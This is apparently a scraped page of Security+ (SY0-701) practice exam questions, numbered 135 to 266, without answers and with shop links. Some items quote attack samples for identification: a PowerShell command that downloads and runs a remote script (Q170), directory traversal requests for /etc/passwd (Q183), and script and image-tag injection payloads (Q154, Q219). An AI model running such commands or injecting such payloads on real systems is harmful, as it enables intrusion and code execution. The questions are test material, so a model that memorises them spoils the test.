Smishing

D.

Vishing

Buy Now
Questions 135

An analyst is evaluating the implementation of Zero Trust principles within the data plane. Which of the following would be most relevant for the analyst to evaluate?

Options:

A.

Secured zones

B.

Subject role

C.

Adaptive identity

D.

Threat scope reduction

Buy Now
Questions 136

While updating the security awareness training, a security analyst wants to address issues created if vendors ' email accounts are compromised. Which of the following recommendations should the security analyst include in the training?

Options:

A.

Refrain from clicking on images included in emails from new vendors.

B.

Delete emails from unknown service provider partners.

C.

Require that invoices be sent as attachments.

D.

Be alert to unexpected requests from familiar email addresses.

Buy Now
Questions 137

Which of the following should be used to prevent changes to system-level data?

Options:

A.

NIDS

B.

DLP

C.

NAC

Buy Now
Questions 138

A systems administrator wants to prevent users from being able to access data based on their responsibilities. The administrator also wants to apply the required access structure via a simplified format. Which of the following should the administrator apply to the site recovery resource group?

Options:

A.

RBAC

B.

ACL

C.

SAML

D.

GPO

Buy Now
Questions 139

An administrator was notified that a user logged in remotely after hours and copied large amounts of data to a personal device.

Which of the following best describes the user’s activity?

Options:

A.

Penetration testing

B.

Phishing campaign

C.

External audit

D.

Insider threat

Buy Now
Questions 140

A Chief Information Security Officer (CISO) implements a new policy that users can no longer access fantasy sports sites while at work. The CISO wants to implement a solution that can adapt to new sites coming online and not have to constantly determine which sites are related to fantasy sports. Which of the following is the best capability for the CISO to leverage?

Options:

A.

IPS

B.

URL scanning

C.

Content categorization

D.

Static denial list

E.

DLP

Buy Now
Questions 141

Which of the following is a security benefit of an effective IT asset tracking system?

Options:

A.

Helping identify unauthorized or unmanaged devices connected to the network

B.

Preventing prohibited data exfiltration from endpoints on the network

C.

Assisting with automated root cause analysis for all security incidents on the network

D.

Ensuring proper data backup and recovery procedures are in place

Buy Now
Questions 142

A company is developing a business continuity strategy and needs to determine how many staff members would be required to sustain the business in the case of a disruption. Which of the following best describes this step?

Options:

A.

Capacity planning

B.

Redundancy

C.

Geographic dispersion

D.

Tablet exercise

Buy Now
Questions 143

One of a company ' s vendors sent an analyst a security bulletin that recommends a BIOS update. Which of the following vulnerability types is being addressed by the patch?

Options:

A.

Virtualization

B.

Firmware

C.

Application

D.

Operating system

Buy Now
Questions 144

Which of the following actions best addresses a vulnerability found on a company ' s web server?

Options:

A.

Patching

B.

Segmentation

C.

Decommissioning

D.

Monitoring

Buy Now
Questions 145

Which of the following techniques can be used to sanitize the data contained on a hard drive while allowing for the hard drive to be repurposed?

Options:

A.

Degaussing

B.

Drive shredder

C.

Retention platform

D.

Wipe tool

Buy Now
Questions 146

A security analyst notices an increase in port scans on the edge of the corporate network. Which of the following logs should the analyst check to obtain the attacker ' s source IP address?

Options:

A.

Security

B.

Firewall

C.

Application

D.

Endpoint

Buy Now
Questions 147

Which of the following documents details how to accomplish a technical security task?

Options:

A.

Standard

B.

Policy

C.

Guideline

D.

Procedure

Buy Now
Questions 148

Which of the following is the most relevant reason a DPO would develop a data inventory?

Options:

A.

To manage data storage requirements better

B.

To determine the impact in the event of a breach

C.

To extend the length of time data can be retained

D.

To automate the reduction of duplicated data

Buy Now
Questions 149

A security report shows that during a two-week test period. 80% of employees unwittingly disclosed their SSO credentials when accessing an external website. The organization purposelycreated the website to simulate a cost-free password complexity test. Which of the following would best help reduce the number of visits to similar websites in the future?

Options:

A.

Block all outbound traffic from the intranet.

B.

Introduce a campaign to recognize phishing attempts.

C.

Restrict internet access for the employees who disclosed credentials.

D.

Implement a deny list of websites.

Buy Now
Questions 150

Which of the following will harden access to a new database system? (Select two)

Options:

A.

Jump server

B.

NIDS

C.

Monitoring

D.

Proxy server

E.

Host-based firewall

F.

WAF

Buy Now
Questions 151

A security analyst reviews logs and finds a large number of malicious requests that have caused performance issues on the company ' s site. Which of the following would have most likely prevented this attack?

Options:

A.

IPSec

B.

TLS

C.

SDN

D.

WAF

Buy Now
Questions 152

Which of the following is a reason an organization should use different CSPs for a critical financial application?

Options:

A.

Application overhead can be better load balanced across multiple providers.

B.

Platform diversity reduces the likelihood of losing access to resources.

C.

Parallel processing allows continued operations while deploying time-critical security updates.

D.

Selection of a hot site minimizes downtime and helps the organization meet its RTO.

Buy Now
Questions 153

Which of the following would be the greatest concern for a company that is aware of the consequences of non-compliance with government regulations?

Options:

A.

Right to be forgotten

B.

Sanctions

C.

External compliance reporting

D.

Attestation

Buy Now
Questions 154

Which of the following examples would be best mitigated by input sanitization?

Options:

A.

< script > alert ( " Warning! " ) ,- < /script >

B.

nmap - 10.11.1.130

C.

Email message: " Click this link to get your free gift card. "

D.

Browser message: " Your connection is not private. "

Buy Now
Questions 155

Which of the following can be used to identify potential attacker activities without affecting production servers?

Options:

A.

Honey pot

B.

Video surveillance

C.

Zero Trust

D.

Geofencing

Buy Now
Questions 156

After a company was compromised, customers initiated a lawsuit. The company ' s attorneys have requested that the security team initiate a legal hold in response to the lawsuit. Which of the following describes the action the security team will most likely be required to take?

Options:

A.

Retain the emails between the security team and affected customers for 30 days.

B.

Retain any communications related to the security breach until further notice.

C.

Retain any communications between security members during the breach response.

D.

Retain all emails from the company to affected customers for an indefinite period of time.

Buy Now
Questions 157

Which of the following is the most likely outcome if a large bank fails an internal PCI DSS compliance assessment?

Options:

A.

Fines

B.

Audit findings

C.

Sanctions

D.

Reputation damage

Buy Now
Questions 158

Which of the following is an algorithm performed to verify that data has not been modified?

Options:

A.

Hash

B.

Code check

C.

Encryption

D.

Checksum

Buy Now
Questions 159

A company ' s website is www. Company. com Attackers purchased the domain wwww. company.com Which of the following types of attacks describes this example?

Options:

A.

Typosquatting

B.

Brand Impersonation

C.

On-path

D.

Watering-hole

Buy Now
Questions 160

Which of the following describes effective change management procedures?

Options:

A.

Approving the change after a successful deployment

B.

Having a backout plan when a patch fails

C.

Using a spreadsheet for tracking changes

D.

Using an automatic change control bypass for security updates

Buy Now
Questions 161

An organization authorizes system deployment on the network after reducing the number of Category 1 vulnerabilities to zero. Which of the following is this scenario an example of?

Options:

A.

Risk avoidance

B.

Risk tolerance

C.

Risk transference

D.

Risk reporting

Buy Now
Questions 162

While considering the organization ' s cloud-adoption strategy, the Chief Information Security Officer sets a goal to outsource patching of firmware, operating systems, and applications to the chosen cloud vendor. Which of the following best meets this goal?

Options:

A.

Community cloud

B.

PaaS

C.

Containerization

D.

Private cloud

E.

SaaS

F.

laaS

Buy Now
Questions 163

Which of the following would be the best way to block unknown programs from executing?

Options:

A.

Access control list

B.

Application allow list.

C.

Host-based firewall

D.

DLP solution

Buy Now
Questions 164

A Chief Information Security Officer (CISO) wants to explicitly raise awareness about the increase of ransomware-as-a-service in a report to the management team. Which of the following best describes the threat actor in the CISO ' s report?

Options:

A.

Insider threat

B.

Hacktivist

C.

Nation-state

D.

Organized crime

Buy Now
Questions 165

Which of the following vulnerabilities will input validation prevent?

Options:

A.

DNS hijacking

B.

Time-of-check

C.

SQL injection

D.

Sideloading

Buy Now
Questions 166

Which of the following would be the best way to test resiliency in the event of a primary power failure?

Options:

A.

Parallel processing

B.

Tabletop exercise

C.

Simulation testing

D.

Production failover

Buy Now
Questions 167

A company uses multiple providers to send its marketing, internal, and support emails. Many of the emails are marked as spam. Which of the following changes should the company make to ensure legitimate emails are validated?

Options:

A.

Disable DKIM to avoid signature conflicts.

B.

Implement DMARC with a " reject " policy to enforce sender validation.

C.

Replace the domain ' s MX record with the marketing provider ' s services.

D.

Update the SPF record to include all authorized sending sources.

Buy Now
Questions 168

Which of the following factors are the most important to address when formulating a training curriculum plan for a security awareness program? (Select two).

Options:

A.

Channels by which the organization communicates with customers

B.

The reporting mechanisms for ethics violations

C.

Threat vectors based on the industry in which the organization operates

D.

Secure software development training for all personnel

E.

Cadence and duration of training events

F.

Retraining requirements for individuals who fail phishing simulations

Buy Now
Questions 169

A site reliability engineer is designing a recovery strategy that requires quick failover to an identical site if the primary facility goes down. Which of the following types of sites should the engineer consider?

Options:

A.

Recovery site

B.

Hot site

C.

Cold site

D.

Warm site

Buy Now
Questions 170

A security analyst reviews the following endpoint log:

powershell -exec bypass -Command " IEX (New-Object Net.WebClient).DownloadString(http://176.30.40.50/evil.ps1 " )

Which of the following logs will help confirm an established connection to IP address 176.30.40.50?

Options:

A.

System event logs

B.

EDR logs

C.

Firewall logs

D.

Application logs

Buy Now
Questions 171

Which of the following agreements defines response time, escalation, and performance metrics?

Options:

A.

BPA

B.

MOA

C.

NDA

D.

SLA

Buy Now
Questions 172

Which of the following activities would involve members of the incident response team and other stakeholders simul-ating an event?

Options:

A.

Lessons learned

B.

Digital forensics

C.

Tabletop exercise

D.

Root cause analysis

Buy Now
Questions 173

Employees located off-site must have access to company resources in order to complete their assigned tasks These employees utilize a solution that allows remote access without interception concerns. Which of the following best describes this solution?

Options:

A.

Proxy server

B.

NGFW

C.

VPN

D.

Security zone

Buy Now
Questions 174

An organization designs an inbound firewall with a fail-open configuration while implementing a website. Which of the following does the organization consider to be the highest priority?

Options:

A.

Confidentiality

B.

Non-repudiation

C.

Availability

D.

Integrity

Buy Now
Questions 175

Client files can only be accessed by employees who need to know the information and have specified roles in the company. Which of the following best describes this security concept?

Options:

A.

Availability

B.

Confidentiality

C.

Integrity

D.

Non-repudiation

Buy Now
Questions 176

Which of the following best describes the practice of preserving and documenting the handling of forensic evidence?

Options:

A.

Acquisition of evidence

B.

E-discovery

C.

Chain of custody

D.

Forensic tabletop exercises

Buy Now
Questions 177

A systems administrator notices that the research and development department is not using the company VPN when accessing various company-related services and systems. Which of the following scenarios describes this activity?

Options:

A.

Espionage

B.

Data exfiltration

C.

Nation-state attack

D.

Shadow IT

Buy Now
Questions 178

A company’s web filter is configured to scan the URL for strings and deny access when matches are found. Which of the following search strings should an analyst employ to prohibit access to non-encrypted websites?

Options:

A.

encryption=off\

B.

http://

C.

www.*.com

D.

:443

Buy Now
Questions 179

A systems administrator is creating a script that would save time and prevent human error when performing account creation for a large number of end users. Which of the following would be a good use case for this task?

Options:

A.

Off-the-shelf software

B.

Orchestration

C.

Baseline

D.

Policy enforcement

Buy Now
Questions 180

Which of the following is a common source of unintentional corporate credential leakage in cloud environments?

Options:

A.

Code repositories

B.

Dark web

C.

Threat feeds

D.

State actors

E.

Vulnerability databases

Buy Now
Questions 181

A systems administrator works for a local hospital and needs to ensure patient data is protected and secure. Which of the following data classifications should be used to secure patient data?

Options:

A.

Private

B.

Critical

C.

Sensitive

D.

Public

Buy Now
Questions 182

Which of the following provides resilience by hosting critical VMs within different IaaS providers while being maintained by internal application owners?

Options:

A.

Multicloud architectures

B.

SaaS provider diversity

C.

On-premises server load balancing

D.

Corporate-owned, off-site locations

Buy Now
Questions 183

While analyzing SIEM alerts for a company ' s WAF, an incident response analyst observes the following:

https://corporate-A.com/loadimage?filename=/etc/

https://corporate-A.com/loadimage?filename=../../etc/passwd

https://corporate-A.com/loadimage?filename=./etc/passwd

Which of the following best describes the observed behavior?

Options:

A.

Credential replay

B.

Directory traversal

C.

Brute-force attack

D.

Resource exhaustion

Buy Now
Questions 184

A security engineer needs to quickly identify a signature from a known malicious file. Which of the following analysis methods would the security engineer most likely use?

Options:

A.

Static

B.

Sandbox

C.

Network traffic

D.

Package monitoring

Buy Now
Questions 185

Which of the following is a preventive physical security control?

Options:

A.

Video surveillance system

B.

Bollards

C.

Alarm system

D.

Motion sensors

Buy Now
Questions 186

Which of the following provides the best protection against unwanted or insecure communications to and from a device?

Options:

A.

System hardening

B.

Host-based firewall

C.

Intrusion detection system

D.

Anti-malware software

Buy Now
Questions 187

A visitor plugs a laptop into a network jack in the lobby and is able to connect to the company ' s network. Which of the following should be configured on the existing network infrastructure to best prevent this activity?

Options:

A.

Port security

B.

Web application firewall

C.

Transport layer security

D.

Virtual private network

Buy Now
Questions 188

A security analyst is reviewing the following logs:

SY0-701 Question 188

Which of the following attacks is most likely occurring?

Options:

A.

Password spraying

B.

Account forgery

C.

Pass-t he-hash

D.

Brute-force

Buy Now
Questions 189

Which of the following is the best way to provide secure remote access for employees while minimizing the exposure of a company ' s internal network?

Options:

A.

VPN

B.

LDAP

C.

FTP

D.

RADIUS

Buy Now
Questions 190

A security analyst must identify abnormal behavior on the server. Which of the following does the analyst most likely need to do?

Options:

A.

Disable unnecessary ports.

B.

Patch the system.

C.

Establish baselines.

D.

Perform alert tuning.

Buy Now
Questions 191

Which of the following describes the reason root cause analysis should be conducted as part of incident response?

Options:

A.

To gather loCs for the investigation

B.

To discover which systems have been affected

C.

To eradicate any trace of malware on the network

D.

To prevent future incidents of the same nature

Buy Now
Questions 192

Which of the following is used to validate a certificate when it is presented to a user?

Options:

A.

OCSP

B.

CSR

C.

CA

D.

CRC

Buy Now
Questions 193

Which of the following tools can assist with detecting an employee who has accidentally emailed a file containing a customer’s PII?

Options:

A.

SCAP

B.

Net Flow

C.

Antivirus

D.

DLP

Buy Now
Questions 194

A company’s legal department drafted sensitive documents in a SaaS application and wants to ensure the documents cannot be accessed by individuals in high-risk countries. Which of the following is the most effective way to limit this access?

Options:

A.

Data masking

B.

Encryption

C.

Geolocation policy

D.

Data sovereignty regulation

Buy Now
Questions 195

A company is planning a disaster recovery site and needs to ensure that a single natural disaster would not result in the complete loss of regulated backup data. Which of the following should the company consider?

Options:

A.

Geographic dispersion

B.

Platform diversity

C.

Hot site

D.

Load balancing

Buy Now
Questions 196

A security analyst investigates abnormal outbound traffic from a corporate endpoint. The traffic is encrypted and uses non-standard ports. Which of the following data sources should the analyst use first to confirm whether this traffic is malicious?

Options:

A.

Application logs

B.

Vulnerability scans

C.

Endpoint logs

D.

Packet captures

Buy Now
Questions 197

Which of the following best describes the purpose of using deception technologies in a security strategy?

Options:

A.

To prevent malware installation through endpoint protection tools

B.

To block all external traffic before it reaches critical information systems

C.

To lure attackers to controlled environments to collect threat intelligence

D.

To detect insider threats by monitoring privileged user accounts

Buy Now
Questions 198

A security analyst is investigating an alert that was produced by endpoint protection software. The analyst determines this event was a false positive triggered by an employee who attempted to download a file. Which of the following is the most likely reason the download was blocked?

Options:

A.

A misconfiguration in the endpoint protection software

B.

A zero-day vulnerability in the file

C.

A supply chain attack on the endpoint protection vendor

D.

Incorrect file permissions

Buy Now
Questions 199

A security analyst is creating the first draft of a network diagram for the company ' s new customer-facing payment application that will be hosted by a third-party cloud service

provider.

SY0-701 Question 199

SY0-701 Question 199

Options:

Buy Now
Questions 200

A systems administrator needs to provide traveling employees with a tool that will protect company devices regardless of where they are working. Which of the following should the administrator implement?

Options:

A.

Isolation

B.

Segmentation

C.

ACL

D.

HIPS

Buy Now
Questions 201

A security engineer configured a remote access VPN. The remote access VPN allows end users to connect to the network by using an agent that is installed on the endpoint, which establishes an encrypted tunnel. Which of the following protocols did the engineer most likely implement?

Options:

A.

GRE

B.

IPSec

C.

SD-WAN

D.

EAP

Buy Now
Questions 202

A systems administrator is working on a solution with the following requirements:

• Provide a secure zone.

• Enforce a company-wide access control policy.

• Reduce the scope of threats.

Which of the following is the systems administrator setting up?

Options:

A.

Zero Trust

B.

AAA

C.

Non-repudiation

D.

CIA

Buy Now
Questions 203

A security analyst scans a company ' s public network and discovers a host is running a remote desktop that can be used to access the production network. Which of the following changes should the security analyst recommend?

Options:

A.

Changing the remote desktop port to a non-standard number

B.

Setting up a VPN and placing the jump server inside the firewall

C.

Using a proxy for web connections from the remote desktop server

D.

Connecting the remote server to the domain and increasing the password length

Buy Now
Questions 204

Which of the following phases of an incident response involves generating reports?

Options:

A.

Recovery

B.

Preparation

C.

Lessons learned

D.

Containment

Buy Now
Questions 205

Which of the following practices would be best to prevent an insider from introducing malicious code into a company ' s development process?

Options:

A.

Code scanning for vulnerabilities

B.

Open-source component usage

C.

Quality assurance testing

D.

Peer review and approval

Buy Now
Questions 206

Which of the following is a feature of a next-generation SIEM system?

Options:

A.

Virus signatures

B.

Automated response actions

C.

Security agent deployment

D.

Vulnerability scanning

Buy Now
Questions 207

An accounting employee recently used software that was not approved by the company. Which of the following risks does this most likely represent?

Options:

A.

Unskilled attacker

B.

Hacktivist

C.

Shadow IT

D.

Supply chain

Buy Now
Questions 208

Which of the following is the most effective way to protect an application server running software that is no longer supported from network threats?

Options:

A.

Air gap

B.

Barricade

C.

Port security

D.

Screen subnet

Buy Now
Questions 209

Which of the following should a systems administrator use to decrease the company ' s hardware attack surface?

Options:

A.

Replication

B.

Isolation

C.

Centralization

D.

Virtualization

Buy Now
Questions 210

Which of the following control types describes an alert from a SIEM tool?

Options:

A.

Preventive

B.

Corrective

C.

Compensating

D.

Detective

Buy Now
Questions 211

Which of the following security principles most likely requires validation before allowing traffic between systems?

Options:

A.

Policy enforcement

B.

Authentication

C.

Zero Trust architecture

D.

Confidentiality

Buy Now
Questions 212

A systems administrator is creating a script that would save time and prevent human error when performing account creation for a large number of users. Which of the following would be a good use case for this task?creating a script

Options:

A.

Off-the-shelf software

B.

Orchestration

C.

Baseline

D.

Policy enforcement

Buy Now
Questions 213

Following a security review, an organization must ensure users verify their identities against the company ' s identity services with individual credentials leveraging WPA2-Enterprise for wireless access. Which of the following configuration steps correctly applies RADIUS in this environment?

Options:

A.

Enabling 802.1X authentication and integrating it with the corporate directory

B.

Installing self-signed certificates on all user devices

C.

Enabling MAC filters for all wireless clients

D.

Configuring the wireless controller to require multifactor authentication

Buy Now
Questions 214

Which of the following threat vectors is most commonly utilized by insider threat actors attempting data exfiltration?

Options:

A.

Unidentified removable devices

B.

Default network device credentials

C.

Spear phishing emails

D.

Impersonation of business units through typosquatting

Buy Now
Questions 215

During a penetration test in a hypervisor, the security engineer is able to inject a malicious payload and access the host filesystem. Which of the following best describes this vulnerability?

Options:

A.

VM escape

B.

Cross-site scripting

C.

Malicious update

D.

SQL injection

Buy Now
Questions 216

Which of the following best explains why an organization would choose a warm site for disaster recovery?

Options:

A.

It reduces complexity by replicating data in real time across identical environments.

B.

It eliminates the need for backup testing by using cloud-native infrastructure.

C.

It offers fully automated fail over with no manual intervention required.

D.

It balances cost and recovery time by maintaining partially configured systems.

Buy Now
Questions 217

A company wants to use new Wi-Fi-enabled environmental sensors in order to automatically collect metrics. Which of the following will the security team most likely do?

Options:

A.

Add the sensor software to the risk register.

B.

Create a VLAN for the sensors.

C.

Physically air gap the sensors.

D.

Configure TLS 1.2 on all sensors.

Buy Now
Questions 218

Which of the following explains how a supply chain service provider could introduce a security vulnerability into an organization?

Options:

A.

Delaying hardware shipments needed for system upgrades

B.

Outsourcing customer service operations to a foreign call center

C.

Failing to encrypt data stored on the organization’s internal database

D.

Having privileged access to client systems and becoming a target for attackers

Buy Now
Questions 219

Which of the following vulnerabilities will lead to a successful attack that injects < IMG src= ' http://attackersite.net/mycode.sh ' > into a web application?

Options:

A.

Directory traversal

B.

Buffer overflow

C.

SQLi

D.

XSS

Buy Now
Questions 220

Which of the following control types is AUP an example of?

Options:

A.

Physical

B.

Managerial

C.

Technical

D.

Operational

Buy Now
Questions 221

Which of the following best explains how tokenization helps protect sensitive data?

Options:

A.

It permanently deletes sensitive information from production systems.

B.

It replaces the original data with reference values that do not hold exploitable meaning.

C.

It stores sensitive data across multiple cloud environments to prevent data loss.

D.

It conceals data by converting it into unreadable ciphertext using symmetric encryption.

Buy Now
Questions 222

A penetration tester was able to gain unauthorized access to a hypervisor platform. Which of the following vulnerabilities was most likely exploited?

Options:

A.

Cross-site scripting

B.

SQL injection

C.

Race condition

D.

VM escape

Buy Now
Questions 223

A security administrator is implementing encryption on all hard drives in an organization. Which of the following security concepts is the administrator applying?

Options:

A.

Integrity

B.

Authentication

C.

Zero Trust

D.

Confidentiality

Buy Now
Questions 224

Which of the following most accurately describes the order in which a security engineer should implement secure baselines?

Options:

A.

Deploy, maintain, establish

B.

Establish, maintain, deploy

C.

Establish, deploy, maintain

D.

Deploy, establish, maintain

Buy Now
Questions 225

A security analyst and the management team are reviewing the organizational performance of a recent phishing campaign. The user click-through rate exceeded the acceptable risk threshold, and the management team wants to reduce the impact when a user clicks on a link in a phishing message. Which of the following should the analyst do?

Options:

A.

Place posters around the office to raise awareness of common phishing activities.

B.

Implement email security filters to prevent phishing emails from being delivered

C.

Update the EDR policies to block automatic execution of downloaded programs.

D.

Create additional training for users to recognize the signs of phishing attempts.

Buy Now
Questions 226

A network manager wants to protect the company ' s VPN by implementing multifactor authentication that uses:

. Something you know

. Something you have

. Something you are

Which of the following would accomplish the manager ' s goal?

Options:

A.

Domain name, PKI, GeolP lookup

B.

VPN IP address, company ID, facial structure

C.

Password, authentication token, thumbprint

D.

Company URL, TLS certificate, home address

Buy Now
Questions 227

An organization issued new laptops to all employees and wants to provide web filtering both in and out of the office without configuring additional access to the network. Which of the following types of web filtering should a systems administrator configure?

Options:

A.

Agent-based

B.

Centralized proxy

C.

URL scanning

D.

Content categorization

Buy Now
Questions 228

A company relies on open-source software libraries to build the software used by its customers. Which of the following vulnerability types would be the most difficult to remediate due to the company ' s reliance on open-source libraries?

Options:

A.

Buffer overflow

B.

SQL injection

C.

Cross-site scripting

D.

Zero day

Buy Now
Questions 229

Which of the following is the most likely reason a security analyst would review SIEM logs?

Options:

A.

To check for recent password reset attempts

B.

To monitor for potential DDoS attacks

C.

To assess the scope of a privacy breach

D.

To see correlations across multiple hosts

Buy Now
Questions 230

An organization is looking to optimize its environment and reduce the number of patches necessary for operating systems. Which of the following will best help to achieve this objective?

Options:

A.

Microservices

B.

Virtualization

C.

Real-time operating system

D.

Containers

Buy Now
Questions 231

Which of the following would most likely be deployed to obtain and analyze attacker activity and techniques?

Options:

A.

Firewall

B.

IDS

C.

Honeypot

D.

Layer 3 switch

Buy Now
Questions 232

Which of the following should an organization focus on the most when making decisions about vulnerability prioritization?

Options:

A.

Exposure factor

B.

CVSS

C.

CVE

D.

Industry impact

Buy Now
Questions 233

A new employee can select a particular make and model of an employee workstation from a preapproved list. Which of the following is this an example of?

Options:

A.

MDM

B.

CYOD

C.

PED

D.

COPE

Buy Now
Questions 234

While reviewing a recent compromise, a forensics team discovers that there are hard-coded credentials in the database connection strings. Which of the following assessment types should be performed during software development to prevent this from reoccurring?

Options:

A.

Vulnerability scan

B.

Penetration test

C.

Static analysis

D.

Quality assurance

Buy Now
Questions 235

A penetration testing report indicated that an organization should implement controls related to database input validation. Which of the following best identifies the type of vulnerability that was likely discovered during the test?

Options:

A.

XSS

B.

Command injection

C.

Buffer overflow

D.

SQLi

Buy Now
Questions 236

Which of the following would best explain why a security analyst is running daily vulnerability scans on all corporate endpoints?

Options:

A.

To track the status of patching installations

B.

To find shadow IT cloud deployments

C.

To continuously the monitor hardware inventory

D.

To hunt for active attackers in the network

Buy Now
Questions 237

An organization has been experiencing issues with deleted network share data and improperly assigned permissions. Which of the following would best help track and remediate these issues?

Options:

A.

DLP

B.

EDR

C.

FIM

D.

ACL

Buy Now
Questions 238

A company has yearly engagements with a service provider. The general terms and conditions are the same for all engagements. The company wants to simplify the process and revisit the general terms every three years. Which of the following documents would provide the best way to set the general terms?

Options:

A.

MSA

B.

NDA

C.

MOU

D.

SLA

Buy Now
Questions 239

Several customers want an organization to verify its security controls are operating effectively and have requested an independent opinion. Which of the following is the most efficient way to address these requests?

Options:

A.

Hire a vendor to perform a penetration test.

B.

Perform an annual self-assessment.

C.

Allow each client the right to audit.

D.

Provide a third-party attestation report.

Buy Now
Questions 240

After reviewing the following vulnerability scanning report:

Server:192.168.14.6

Service: Telnet

Port: 23 Protocol: TCP

Status: Open Severity: High

Vulnerability: Use of an insecure network protocol

A security analyst performs the following test:

nmap -p 23 192.168.14.6 —script telnet-encryption

PORT STATE SERVICE REASON

23/tcp open telnet syn-ack

I telnet encryption:

| _ Telnet server supports encryption

Which of the following would the security analyst conclude for this reported vulnerability?

Options:

A.

It is a false positive.

B.

A rescan is required.

C.

It is considered noise.

D.

Compensating controls exist.

Buy Now
Questions 241

A company decides to purchase an insurance policy. Which of the following risk management strategies is this company implementing?

Options:

A.

Mitigate

B.

Accept

C.

Avoid

D.

Transfer

Buy Now
Questions 242

A company is considering an expansion of access controls for an application that contractors and internal employees use to reduce costs. Which of the following risk elements should the implementation team understand before granting access to the application?

Options:

A.

Threshold

B.

Appetite

C.

Tolerance

D.

Register

Buy Now
Questions 243

A company must ensure that log searches are conducted in the shortest time frame. Which of the following should the company do to maintain logs in live storage for 90 days?

Options:

A.

Conduct deduplication.

B.

Conduct archiving.

C.

Apply aggregation.

D.

Apply compression.

Buy Now
Questions 244

Which of the following explains how organizations benefit from SCAP?

Options:

A.

The configurations defined as part of established baselines allow organizations to deploy well-tested security solutions quickly and easily.

B.

The consolidated reporting layout makes it easier for technicians to communicate incident response to senior decision-makers.

C.

The common format for vulnerability scanning and reporting enables greater interoperability between security tools from different vendors.

D.

The strict compliance to international standards reduces overall cost and risk to organizations when a security breach occurs.

Buy Now
Questions 245

An IT manager is putting together a documented plan describing how the organization will keep operating in the event of a global incident. Which of the following plans is the IT manager creating?

Options:

A.

Business continuity

B.

Physical security

C.

Change management

D.

Disaster recovery

Buy Now
Questions 246

Various company stakeholders meet to discuss roles and responsibilities in the event of a security breach that would affect offshore offices. Which of the following is this an example of?

Options:

A.

Tabletop exercise

B.

Penetration test

C.

Geographic dispersion

D.

Incident response

Buy Now
Questions 247

The help desk receives multiple calls that machines with an outdated OS version are running slowly. Several users are seeing virus detection alerts. Which of the following mitigation techniques should be reviewed first?

Options:

A.

Patching

B.

Segmentation

C.

Monitoring

D.

Isolation

Buy Now
Questions 248

Which of the following automation use cases would best enhance the security posture of an organization by rapidly updating permissions when employees leave a company?

Options:

A.

Provisioning resources

B.

Disabling access

C.

Reviewing change approvals

D.

Escalating permission requests

Buy Now
Questions 249

Which of the following steps in the incident response process involves developing a hypothesis of possible attack paths and using various sources to confirm or deny the hypothesis?

Options:

A.

Identification

B.

Investigation

C.

Containment

D.

Preparation

Buy Now
Questions 250

Which of the following should a systems administrator use to ensure an easy deployment of resources within the cloud provider?

Options:

A.

Software as a service

B.

Infrastructure as code

C.

Internet of Things

D.

Software-defined networking

Buy Now
Questions 251

An analyst wants to move data from production to the UAT server to test the latest release. Which of the following strategies should the analyst use to protect sensitive data from being viewed by the testing team?

Options:

A.

Data masking

B.

Data tokenization

C.

Data obfuscation

D.

Data encryption

Buy Now
Questions 252

A security analyst receives an alert that there was an attempt to download known malware. Which of the following actions would allow the best chance to analyze the malware?

Options:

A.

Review the IPS logs and determine which command-and-control IPs were blocked.

B.

Analyze application logs to see how the malware attempted to maintain persistence.

C.

Run vulnerability scans to check for systems and applications that are vulnerable to the malware.

D.

Obtain and execute the malware in a sandbox environment and perform packet captures.

Buy Now
Questions 253

Which of the following describes the difference between encryption and hashing?

Options:

A.

Encryption protects data in transit, while hashing protects data at rest.

B.

Encryption replaces cleartext with ciphertext, while hashing calculates a checksum.

C.

Encryption ensures data integrity, while hashing ensures data confidentiality.

D.

Encryption uses a public-key exchange, while hashing uses a private key.

Buy Now
Questions 254

A company evaluates several options that would allow employees to have remote access to the network. The security team wants to ensure the solution includes AAA to comply with internal security policies. Which of the following should the security team recommend?

Options:

A.

IPSec with RADIUS

B.

RDP connection with LDAPS

C.

Web proxy for all remote traffic

D.

Jump server with 802.1X

Buy Now
Questions 255

A security analyst is reviewing alerts in the SIEM related to potential malicious network traffic coming from an employee’s corporate laptop. The security analyst has determined that additional data about the executable running on the machine is necessary to continue the investigation. Which of the following logs should the analyst use as a data source?

Options:

A.

Application

B.

IPS/IDS

C.

Network

D.

Endpoint

Buy Now
Questions 256

Which of the following is the first step to secure a newly deployed server?

Options:

A.

Close unnecessary service ports.

B.

Update the current version of the software.

C.

Add the device to the ACL.

D.

Upgrade the OS version.

Buy Now
Questions 257

During a routine audit, an analyst discovers that a department at a high school uses a simul-ation program that was not properly vetted before deployment.

Which of the following threats is this an example of?

Options:

A.

Espionage

B.

Data exfiltration

C.

Shadow IT

D.

Zero-day

Buy Now
Questions 258

Which of the following is a possible consequence of a VM escape?

Options:

A.

Malicious instructions can be inserted into memory and give the attacker elevated permissions.

B.

An attacker can access the hypervisor and compromise other VMs.

C.

Unencrypted data can be read by a user in a separate environment.

D.

Users can install software that is not on the manufacturer ' s approved list.

Buy Now
Questions 259

Which of the following is an example of memory injection?

Options:

A.

Two processes access the same variable, allowing one to cause a privilege escalation.

B.

A process receives an unexpected amount of data, which causes malicious code to be executed.

C.

Malicious code is copied to the allocated space of an already running process.

D.

An executable is overwritten on the disk, and malicious code runs the next time it is executed.

Buy Now
Questions 260

Which of the following environments utilizes a subset of customer data and is most likely to be used to assess the impacts of major system upgrades and demonstrate system features?

Options:

A.

Development

B.

Test

C.

Production

D.

Staging

Buy Now
Questions 261

Which of the following is the best reason to complete an audit in a banking environment?

Options:

A.

Regulatory requirement

B.

Organizational change

C.

Self-assessment requirement

D.

Service-level requirement

Buy Now
Questions 262

Which of the following is prevented by proper data sanitization?

Options:

A.

Hackers ' ability to obtain data from used hard drives

B.

Devices reaching end-of-life and losing support

C.

Disclosure of sensitive data through incorrect classification

D.

Incorrect inventory data leading to a laptop shortage

Buy Now
Questions 263

Which of the following is the best way to consistently determine on a daily basis whether security settings on servers have been modified?

Options:

A.

Automation

B.

Compliance checklist

C.

Attestation

D.

Manual audit

Buy Now
Questions 264

Which of the following is an example of a data protection strategy that uses tokenization?

Options:

A.

Encrypting databases containing sensitive data

B.

Replacing sensitive data with surrogate values

C.

Removing sensitive data from production systems

D.

Hashing sensitive data in critical systems

Buy Now
Questions 265

Which of the following is a benefit of an RTO when conducting a business impact analysis?

Options:

A.

It determines the likelihood of an incident and its cost.

B.

It determines the roles and responsibilities for incident responders.

C.

It determines the state that systems should be restored to following an incident.

D.

It determines how long an organization can tolerate downtime after an incident.

Buy Now
Questions 266

The security team notices that the Always On VPN solution sometimes fails to connect. This leaves remote users unprotected because they cannot connect to the on-premises web proxy. Which of the following changes will best provide web protection in this scenario?

Options:

A.

